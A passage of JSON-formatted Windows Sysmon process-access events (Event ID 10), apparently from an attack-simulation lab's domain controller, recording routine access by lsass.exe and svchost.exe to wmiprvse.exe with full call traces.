84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.875","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3728,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.890\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.890","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3729,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.890\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.890","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3730,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.890\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.890","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3731,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3732,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3733,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3734,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.953\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.953","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3735,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.953\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 